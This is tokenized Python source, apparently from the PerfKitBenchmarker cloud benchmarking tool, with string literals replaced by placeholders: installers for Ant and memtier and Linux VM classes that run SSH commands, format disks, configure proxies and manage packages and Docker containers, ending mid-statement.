<s> """<STR_LIT>""" <EOL> import posixpath <EOL> from perfkitbenchmarker import vm_util <EOL> ANT_TAR_URL = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ANT_HOME_DIR = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> def _Install ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_util . VM_TMP_DIR , ANT_TAR_URL , ANT_HOME_DIR ) ) <EOL> def YumInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Install ( vm ) <EOL> def AptInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Install ( vm ) </s>
<s> """<STR_LIT>""" <EOL> from perfkitbenchmarker import vm_util <EOL> GIT_REPO = '<STR_LIT>' <EOL> GIT_TAG = '<STR_LIT>' <EOL> LIBEVENT_TAR = '<STR_LIT>' <EOL> LIBEVENT_URL = '<STR_LIT>' + LIBEVENT_TAR <EOL> LIBEVENT_DIR = '<STR_LIT>' % vm_util . VM_TMP_DIR <EOL> MEMTIER_DIR = '<STR_LIT>' % vm_util . VM_TMP_DIR <EOL> APT_PACKAGES = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> YUM_PACKAGES = '<STR_LIT>' <EOL> def YumInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . InstallPackages ( YUM_PACKAGES ) <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( LIBEVENT_URL , vm_util . VM_TMP_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( vm_util . VM_TMP_DIR , <EOL> LIBEVENT_TAR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( <EOL> LIBEVENT_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( GIT_REPO , MEMTIER_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( MEMTIER_DIR , GIT_TAG ) ) <EOL> pkg_config = '<STR_LIT>' <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( MEMTIER_DIR , pkg_config ) ) <EOL> def AptInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . InstallPackages ( APT_PACKAGES ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( GIT_REPO , MEMTIER_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( MEMTIER_DIR , GIT_TAG ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( MEMTIER_DIR ) ) <EOL> def _Uninstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( MEMTIER_DIR ) ) <EOL> def YumUninstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Uninstall ( vm ) <EOL> def AptUninstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Uninstall ( vm ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os <EOL> import pipes <EOL> import posixpath <EOL> import re <EOL> import threading <EOL> import time <EOL> import uuid <EOL> import yaml <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker import errors <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker import linux_packages <EOL> from perfkitbenchmarker import os_types <EOL> from perfkitbenchmarker import virtual_machine <EOL> from perfkitbenchmarker import vm_util <EOL> FLAGS = flags . FLAGS <EOL> EPEL6_RPM = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> EPEL7_RPM = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> UPDATE_RETRIES = <NUM_LIT:5> <EOL> SSH_RETRIES = <NUM_LIT:10> <EOL> DEFAULT_SSH_PORT = <NUM_LIT> <EOL> REMOTE_KEY_PATH = '<STR_LIT>' <EOL> CONTAINER_MOUNT_DIR = '<STR_LIT>' <EOL> CONTAINER_WORK_DIR = '<STR_LIT>' <EOL> BACKGROUND_IPERF_PORT = <NUM_LIT> <EOL> BACKGROUND_IPERF_SECONDS = <NUM_LIT> <EOL> EXECUTE_COMMAND = '<STR_LIT>' <EOL> WAIT_FOR_COMMAND = '<STR_LIT>' <EOL> flags . DEFINE_bool ( '<STR_LIT>' , False , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class BaseLinuxMixin ( virtual_machine . BaseOsMixin ) : <EOL> """<STR_LIT>""" <EOL> _pseudo_tty_lock = threading . Lock ( ) <EOL> def __init__ ( self ) : <EOL> super ( BaseLinuxMixin , self ) . __init__ ( ) <EOL> self . ssh_port = DEFAULT_SSH_PORT <EOL> self . remote_access_ports = [ self . ssh_port ] <EOL> self . has_private_key = False <EOL> self . _remote_command_script_upload_lock = threading . Lock ( ) <EOL> self . _has_remote_command_script = False <EOL> def _PushRobustCommandScripts ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . _remote_command_script_upload_lock : <EOL> if not self . _has_remote_command_script : <EOL> for f in ( EXECUTE_COMMAND , WAIT_FOR_COMMAND ) : <EOL> self . PushDataFile ( f , os . path . join ( vm_util . VM_TMP_DIR , <EOL> os . path . basename ( f ) ) ) <EOL> self . _has_remote_command_script = True <EOL> def RobustRemoteCommand ( self , command , should_log = False ) : <EOL> """<STR_LIT>""" <EOL> self . _PushRobustCommandScripts ( ) <EOL> execute_path = os . path . join ( vm_util . VM_TMP_DIR , <EOL> os . path . basename ( EXECUTE_COMMAND ) ) <EOL> wait_path = os . path . join ( vm_util . VM_TMP_DIR , <EOL> os . path . basename ( WAIT_FOR_COMMAND ) ) <EOL> uid = uuid . uuid4 ( ) <EOL> file_base = os . path . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' % uid ) <EOL> wrapper_log = file_base + '<STR_LIT>' <EOL> stdout_file = file_base + '<STR_LIT>' <EOL> stderr_file = file_base + '<STR_LIT>' <EOL> status_file = file_base + '<STR_LIT>' <EOL> if not isinstance ( command , basestring ) : <EOL> command = '<STR_LIT:U+0020>' . join ( command ) <EOL> start_command = [ '<STR_LIT>' , '<STR_LIT>' , execute_path , <EOL> '<STR_LIT>' , stdout_file , <EOL> '<STR_LIT>' , stderr_file , <EOL> '<STR_LIT>' , status_file , <EOL> '<STR_LIT>' , pipes . quote ( command ) ] <EOL> start_command = '<STR_LIT>' % ( '<STR_LIT:U+0020>' . join ( start_command ) , <EOL> wrapper_log ) <EOL> self . RemoteCommand ( start_command ) <EOL> wait_command = [ '<STR_LIT>' , wait_path , '<STR_LIT>' , stdout_file , <EOL> '<STR_LIT>' , stderr_file , <EOL> '<STR_LIT>' , status_file , <EOL> '<STR_LIT>' ] <EOL> try : <EOL> return self . RemoteCommand ( '<STR_LIT:U+0020>' . join ( wait_command ) , should_log = should_log ) <EOL> except errors . VirtualMachine . RemoteCommandError : <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' % wrapper_log , should_log = False ) <EOL> if stdout . strip ( ) : <EOL> logging . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , stdout ) <EOL> raise <EOL> def SetupRemoteFirewall ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> def SetupProxy ( self ) : <EOL> """<STR_LIT>""" <EOL> env_file = "<STR_LIT>" <EOL> commands = [ ] <EOL> if FLAGS . http_proxy : <EOL> commands . append ( "<STR_LIT>" % ( <EOL> FLAGS . http_proxy , env_file ) ) <EOL> if FLAGS . https_proxy : <EOL> commands . append ( "<STR_LIT>" % ( <EOL> FLAGS . https_proxy , env_file ) ) <EOL> if FLAGS . ftp_proxy : <EOL> commands . append ( "<STR_LIT>" % ( <EOL> FLAGS . ftp_proxy , env_file ) ) <EOL> if commands : <EOL> self . RemoteCommand ( "<STR_LIT:;>" . join ( commands ) ) <EOL> def SetupPackageManager ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def PrepareVMEnvironment ( self ) : <EOL> self . SetupProxy ( ) <EOL> self . RemoteCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> if FLAGS . setup_remote_firewall : <EOL> self . SetupRemoteFirewall ( ) <EOL> if self . install_packages : <EOL> if self . is_static : <EOL> self . SnapshotPackages ( ) <EOL> self . SetupPackageManager ( ) <EOL> self . BurnCpu ( ) <EOL> @ vm_util . Retry ( log_errors = False , poll_interval = <NUM_LIT:1> ) <EOL> def WaitForBootCompletion ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' , retries = <NUM_LIT:1> , <EOL> suppress_warning = True ) <EOL> if self . bootable_time is None : <EOL> self . bootable_time = time . time ( ) <EOL> if self . hostname is None : <EOL> self . hostname = resp [ : - <NUM_LIT:1> ] <EOL> def SnapshotPackages ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def RestorePackages ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def PackageCleanup ( self ) : <EOL> """<STR_LIT>""" <EOL> for package_name in self . _installed_packages : <EOL> self . Uninstall ( package_name ) <EOL> self . RestorePackages ( ) <EOL> self . RemoteCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> def GetPathToConfig ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def GetServiceName ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ vm_util . Retry ( ) <EOL> def FormatDisk ( self , device_path ) : <EOL> """<STR_LIT>""" <EOL> fmt_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % device_path ) <EOL> self . RemoteHostCommand ( fmt_cmd ) <EOL> def MountDisk ( self , device_path , mount_path ) : <EOL> """<STR_LIT>""" <EOL> mnt_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( device_path , mount_path ) <EOL> self . RemoteHostCommand ( mnt_cmd ) <EOL> def RemoteCopy ( self , file_path , remote_path = '<STR_LIT>' , copy_to = True ) : <EOL> self . RemoteHostCopy ( file_path , remote_path , copy_to ) <EOL> def RemoteHostCopy ( self , file_path , remote_path = '<STR_LIT>' , copy_to = True ) : <EOL> """<STR_LIT>""" <EOL> if vm_util . RunningOnWindows ( ) : <EOL> if '<STR_LIT::>' in file_path : <EOL> file_path = file_path . split ( '<STR_LIT::>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> file_path = '<STR_LIT:/>' . join ( file_path . rsplit ( '<STR_LIT:\\>' , <NUM_LIT:1> ) ) <EOL> remote_location = '<STR_LIT>' % ( <EOL> self . user_name , self . ip_address , remote_path ) <EOL> scp_cmd = [ '<STR_LIT>' , '<STR_LIT>' , str ( self . ssh_port ) , '<STR_LIT>' ] <EOL> scp_cmd . extend ( vm_util . GetSshOptions ( self . ssh_private_key ) ) <EOL> if copy_to : <EOL> scp_cmd . extend ( [ file_path , remote_location ] ) <EOL> else : <EOL> scp_cmd . extend ( [ remote_location , file_path ] ) <EOL> stdout , stderr , retcode = vm_util . IssueCommand ( scp_cmd , timeout = None ) <EOL> if retcode : <EOL> full_cmd = '<STR_LIT:U+0020>' . join ( scp_cmd ) <EOL> error_text = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( retcode , full_cmd , stdout , stderr ) ) <EOL> raise errors . VirtualMachine . RemoteCommandError ( error_text ) <EOL> def RemoteCommand ( self , command , <EOL> should_log = False , retries = SSH_RETRIES , <EOL> ignore_failure = False , login_shell = False , <EOL> suppress_warning = False , timeout = None ) : <EOL> return self . RemoteHostCommand ( command , should_log , retries , <EOL> ignore_failure , login_shell , <EOL> suppress_warning , timeout ) <EOL> def RemoteHostCommand ( self , command , <EOL> should_log = False , retries = SSH_RETRIES , <EOL> ignore_failure = False , login_shell = False , <EOL> suppress_warning = False , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> if vm_util . RunningOnWindows ( ) : <EOL> command = command . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> user_host = '<STR_LIT>' % ( self . user_name , self . ip_address ) <EOL> ssh_cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , str ( self . ssh_port ) , user_host ] <EOL> ssh_cmd . extend ( vm_util . GetSshOptions ( self . ssh_private_key ) ) <EOL> try : <EOL> if login_shell : <EOL> ssh_cmd . extend ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % command ] ) <EOL> self . _pseudo_tty_lock . acquire ( ) <EOL> else : <EOL> ssh_cmd . append ( command ) <EOL> for _ in range ( retries ) : <EOL> stdout , stderr , retcode = vm_util . IssueCommand ( <EOL> ssh_cmd , force_info_log = should_log , <EOL> suppress_warning = suppress_warning , <EOL> timeout = timeout ) <EOL> if retcode != <NUM_LIT:255> : <EOL> break <EOL> finally : <EOL> if login_shell : <EOL> self . _pseudo_tty_lock . release ( ) <EOL> if retcode : <EOL> full_cmd = '<STR_LIT:U+0020>' . join ( ssh_cmd ) <EOL> error_text = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( retcode , command , full_cmd , stdout , stderr ) ) <EOL> if not ignore_failure : <EOL> raise errors . VirtualMachine . RemoteCommandError ( error_text ) <EOL> return stdout , stderr <EOL> def MoveFile ( self , target , source_path , remote_path = '<STR_LIT>' ) : <EOL> self . MoveHostFile ( target , source_path , remote_path ) <EOL> def MoveHostFile ( self , target , source_path , remote_path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . AuthenticateVm ( ) <EOL> remote_location = '<STR_LIT>' % ( <EOL> target . user_name , target . ip_address , remote_path ) <EOL> self . RemoteHostCommand ( '<STR_LIT>' % <EOL> ( target . ssh_port , REMOTE_KEY_PATH , source_path , <EOL> remote_location ) ) <EOL> def AuthenticateVm ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_static and not self . has_private_key : <EOL> self . RemoteHostCopy ( vm_util . GetPrivateKeyPath ( ) , <EOL> REMOTE_KEY_PATH ) <EOL> with vm_util . NamedTemporaryFile ( ) as tf : <EOL> tf . write ( '<STR_LIT>' ) <EOL> tf . write ( '<STR_LIT>' ) <EOL> tf . close ( ) <EOL> self . PushFile ( tf . name , '<STR_LIT>' ) <EOL> self . has_private_key = True <EOL> def TestAuthentication ( self , peer ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . RemoteCommand ( '<STR_LIT>' % peer . internal_ip ) <EOL> except errors . VirtualMachine . RemoteCommandError : <EOL> raise errors . VirtualMachine . AuthError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( self , peer ) ) <EOL> def CheckJavaVersion ( self ) : <EOL> """<STR_LIT>""" <EOL> version , _ = self . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return version [ : - <NUM_LIT:1> ] <EOL> def RemoveFile ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % filename ) <EOL> def GetDeviceSizeFromPath ( self , path ) : <EOL> """<STR_LIT>""" <EOL> df_command = "<STR_LIT>" % path <EOL> stdout , _ = self . RemoteCommand ( df_command ) <EOL> return int ( stdout ) <EOL> def DropCaches ( self ) : <EOL> """<STR_LIT>""" <EOL> drop_caches_command = '<STR_LIT>' <EOL> self . RemoteCommand ( drop_caches_command ) <EOL> def _GetNumCpus ( self ) : <EOL> """<STR_LIT>""" <EOL> stdout , _ = self . RemoteCommand ( <EOL> '<STR_LIT>' ) <EOL> return int ( stdout ) <EOL> def _GetTotalMemoryKb ( self ) : <EOL> """<STR_LIT>""" <EOL> meminfo_command = '<STR_LIT>' <EOL> stdout , _ = self . RemoteCommand ( meminfo_command ) <EOL> return int ( stdout ) <EOL> def _TestReachable ( self , ip ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . RemoteCommand ( '<STR_LIT>' % ip ) <EOL> except errors . VirtualMachine . RemoteCommandError : <EOL> return False <EOL> return True <EOL> def SetupLocalDisks ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _CreateScratchDiskFromDisks ( self , disk_spec , disks ) : <EOL> """<STR_LIT>""" <EOL> if len ( disks ) > <NUM_LIT:1> : <EOL> disk_spec . device_path = '<STR_LIT>' % len ( self . scratch_disks ) <EOL> data_disk = disk . StripedDisk ( disk_spec , disks ) <EOL> else : <EOL> data_disk = disks [ <NUM_LIT:0> ] <EOL> self . scratch_disks . append ( data_disk ) <EOL> if data_disk . disk_type != disk . LOCAL : <EOL> data_disk . Create ( ) <EOL> data_disk . Attach ( self ) <EOL> if data_disk . is_striped : <EOL> device_paths = [ d . GetDevicePath ( ) for d in data_disk . disks ] <EOL> self . StripeDisks ( device_paths , data_disk . GetDevicePath ( ) ) <EOL> if disk_spec . mount_point : <EOL> self . FormatDisk ( data_disk . GetDevicePath ( ) ) <EOL> self . MountDisk ( data_disk . GetDevicePath ( ) , disk_spec . mount_point ) <EOL> def StripeDisks ( self , devices , striped_device ) : <EOL> """<STR_LIT>""" <EOL> self . Install ( '<STR_LIT>' ) <EOL> stripe_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( striped_device , len ( devices ) , '<STR_LIT:U+0020>' . join ( devices ) ) ) <EOL> self . RemoteHostCommand ( stripe_cmd ) <EOL> def BurnCpu ( self , burn_cpu_threads = None , burn_cpu_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> burn_cpu_threads = burn_cpu_threads or FLAGS . burn_cpu_threads <EOL> burn_cpu_seconds = burn_cpu_seconds or FLAGS . burn_cpu_seconds <EOL> if burn_cpu_seconds : <EOL> self . Install ( '<STR_LIT>' ) <EOL> end_time = time . time ( ) + burn_cpu_seconds <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % burn_cpu_threads ) <EOL> if time . time ( ) < end_time : <EOL> time . sleep ( end_time - time . time ( ) ) <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> def PrepareBackgroundWorkload ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . background_cpu_threads : <EOL> self . Install ( '<STR_LIT>' ) <EOL> if self . background_network_mbits_per_sec : <EOL> self . Install ( '<STR_LIT>' ) <EOL> def StartBackgroundWorkload ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . background_cpu_threads : <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % self . background_cpu_threads ) <EOL> if self . background_network_mbits_per_sec : <EOL> self . AllowPort ( BACKGROUND_IPERF_PORT ) <EOL> self . RemoteCommand ( '<STR_LIT>' % <EOL> BACKGROUND_IPERF_PORT ) <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' ) <EOL> self . server_pid = stdout . strip ( ) <EOL> if self . background_network_ip_type == vm_util . IpAddressSubset . EXTERNAL : <EOL> ip_address = self . ip_address <EOL> else : <EOL> ip_address = self . internal_ip <EOL> iperf_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( ip_address , BACKGROUND_IPERF_PORT , <EOL> BACKGROUND_IPERF_SECONDS , <EOL> self . background_network_mbits_per_sec ) ) <EOL> self . RemoteCommand ( iperf_cmd ) <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' ) <EOL> self . client_pid = stdout . strip ( ) <EOL> def StopBackgroundWorkload ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . background_cpu_threads : <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> if self . background_network_mbits_per_sec : <EOL> self . RemoteCommand ( '<STR_LIT>' + self . client_pid ) <EOL> self . RemoteCommand ( '<STR_LIT>' + self . server_pid ) <EOL> class RhelMixin ( BaseLinuxMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . RHEL <EOL> def OnStartup ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteHostCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . user_name , <EOL> login_shell = True ) <EOL> def InstallEpelRepo ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . InstallPackages ( '<STR_LIT>' ) <EOL> except errors . VirtualMachine . RemoteCommandError as e : <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' ) <EOL> major_version = int ( re . search ( '<STR_LIT>' , stdout ) . group ( <NUM_LIT:1> ) ) <EOL> if major_version == <NUM_LIT:6> : <EOL> epel_rpm = EPEL6_RPM <EOL> elif major_version == <NUM_LIT:7> : <EOL> epel_rpm = EPEL7_RPM <EOL> else : <EOL> raise e <EOL> self . RemoteCommand ( '<STR_LIT>' % epel_rpm ) <EOL> def PackageCleanup ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RhelMixin , self ) . PackageCleanup ( ) <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> def SnapshotPackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> def RestorePackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> vm_util . VM_TMP_DIR , <EOL> ignore_failure = True ) <EOL> def InstallPackages ( self , packages ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % packages ) <EOL> def InstallPackageGroup ( self , package_group ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % package_group ) <EOL> def Install ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> if not self . install_packages : <EOL> return <EOL> if package_name not in self . _installed_packages : <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> package . YumInstall ( self ) <EOL> self . _installed_packages . add ( package_name ) <EOL> def Uninstall ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> if hasattr ( package , '<STR_LIT>' ) : <EOL> package . YumUninstall ( self ) <EOL> def GetPathToConfig ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . YumGetPathToConfig ( self ) <EOL> def GetServiceName ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . YumGetServiceName ( self ) <EOL> def SetupProxy ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RhelMixin , self ) . SetupProxy ( ) <EOL> yum_proxy_file = "<STR_LIT>" <EOL> if FLAGS . http_proxy : <EOL> self . RemoteCommand ( "<STR_LIT>" % ( <EOL> FLAGS . http_proxy , yum_proxy_file ) ) <EOL> class DebianMixin ( BaseLinuxMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . DEBIAN <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( DebianMixin , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _apt_updated = False <EOL> @ vm_util . Retry ( max_retries = UPDATE_RETRIES ) <EOL> def AptUpdate ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . RemoteCommand ( '<STR_LIT>' , timeout = <NUM_LIT> ) <EOL> except errors . VirtualMachine . RemoteCommandError as e : <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> raise e <EOL> def SnapshotPackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> def RestorePackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> self . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ vm_util . Retry ( ) <EOL> def InstallPackages ( self , packages ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> install_command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( packages ) ) <EOL> self . RemoteCommand ( install_command ) <EOL> except errors . VirtualMachine . RemoteCommandError as e : <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> logging . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , packages , self ) <EOL> self . AptUpdate ( ) <EOL> raise e <EOL> def Install ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> if not self . install_packages : <EOL> return <EOL> if not self . _apt_updated : <EOL> self . AptUpdate ( ) <EOL> self . _apt_updated = True <EOL> if package_name not in self . _installed_packages : <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> package . AptInstall ( self ) <EOL> self . _installed_packages . add ( package_name ) <EOL> def Uninstall ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> if hasattr ( package , '<STR_LIT>' ) : <EOL> package . AptUninstall ( self ) <EOL> def GetPathToConfig ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . AptGetPathToConfig ( self ) <EOL> def GetServiceName ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . AptGetServiceName ( self ) <EOL> def SetupProxy ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( DebianMixin , self ) . SetupProxy ( ) <EOL> apt_proxy_file = "<STR_LIT>" <EOL> commands = [ ] <EOL> if FLAGS . http_proxy : <EOL> commands . append ( "<STR_LIT>" <EOL> '<STR_LIT>' % ( FLAGS . http_proxy , apt_proxy_file ) ) <EOL> if FLAGS . https_proxy : <EOL> commands . append ( "<STR_LIT>" <EOL> '<STR_LIT>' % ( FLAGS . https_proxy , apt_proxy_file ) ) <EOL> if commands : <EOL> self . RemoteCommand ( "<STR_LIT:;>" . join ( commands ) ) <EOL> class ContainerizedDebianMixin ( DebianMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . UBUNTU_CONTAINER <EOL> def _CheckDockerExists ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' , ignore_failure = True , <EOL> suppress_warning = True ) <EOL> if resp . rstrip ( ) == "<STR_LIT>" : <EOL> return False <EOL> return True <EOL> def PrepareVMEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteHostCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> if not self . _CheckDockerExists ( ) : <EOL> self . Install ( '<STR_LIT>' ) <EOL> self . InitDocker ( ) <EOL> self . Install ( '<STR_LIT>' ) <EOL> super ( ContainerizedDebianMixin , self ) . PrepareVMEnvironment ( ) <EOL> def InitDocker ( self ) : <EOL> """<STR_LIT>""" <EOL> self . CONTAINER_IMAGE = '<STR_LIT>' <EOL> init_docker_cmd = [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( CONTAINER_WORK_DIR , <EOL> vm_util . VM_TMP_DIR , <EOL> CONTAINER_MOUNT_DIR ) ] <EOL> for sd in self . scratch_disks : <EOL> init_docker_cmd . append ( '<STR_LIT>' % ( sd . mount_point , sd . mount_point ) ) <EOL> init_docker_cmd . append ( '<STR_LIT>' % self . CONTAINER_IMAGE ) <EOL> init_docker_cmd = '<STR_LIT>' . join ( init_docker_cmd ) <EOL> resp , _ = self . RemoteHostCommand ( init_docker_cmd ) <EOL> self . docker_id = resp . rstrip ( ) <EOL> return self . docker_id <EOL> def RemoteCommand ( self , command , <EOL> should_log = False , retries = SSH_RETRIES , <EOL> ignore_failure = False , login_shell = False , <EOL> suppress_warning = False , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> command = command . replace ( "<STR_LIT:'>" , r"<STR_LIT>" ) <EOL> logging . info ( '<STR_LIT>' % command ) <EOL> command = "<STR_LIT>" % ( self . docker_id , command ) <EOL> return self . RemoteHostCommand ( command , should_log , retries , <EOL> ignore_failure , login_shell , suppress_warning ) <EOL> def ContainerCopy ( self , file_name , container_path = '<STR_LIT>' , copy_to = True ) : <EOL> """<STR_LIT>""" <EOL> if copy_to : <EOL> if container_path == '<STR_LIT>' : <EOL> container_path = CONTAINER_WORK_DIR <EOL> source_path = posixpath . join ( CONTAINER_MOUNT_DIR , file_name ) <EOL> command = '<STR_LIT>' % ( source_path , container_path ) <EOL> self . RemoteCommand ( command ) <EOL> else : <EOL> if container_path == '<STR_LIT>' : <EOL> raise errors . VirtualMachine . RemoteExceptionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> destination_path = posixpath . join ( CONTAINER_MOUNT_DIR , file_name ) <EOL> command = '<STR_LIT>' % ( container_path , destination_path ) <EOL> self . RemoteCommand ( command ) <EOL> @ vm_util . Retry ( <EOL> poll_interval = <NUM_LIT:1> , max_retries = <NUM_LIT:3> , <EOL> retryable_exceptions = ( errors . VirtualMachine . RemoteCommandError , ) ) <EOL> def RemoteCopy ( self , file_path , remote_path = '<STR_LIT>' , copy_to = True ) : <EOL> """<STR_LIT>""" <EOL> if copy_to : <EOL> file_name = os . path . basename ( file_path ) <EOL> tmp_path = posixpath . join ( vm_util . VM_TMP_DIR , file_name ) <EOL> self . RemoteHostCopy ( file_path , tmp_path , copy_to ) <EOL> self . ContainerCopy ( file_name , remote_path , copy_to ) <EOL> else : <EOL> file_name = 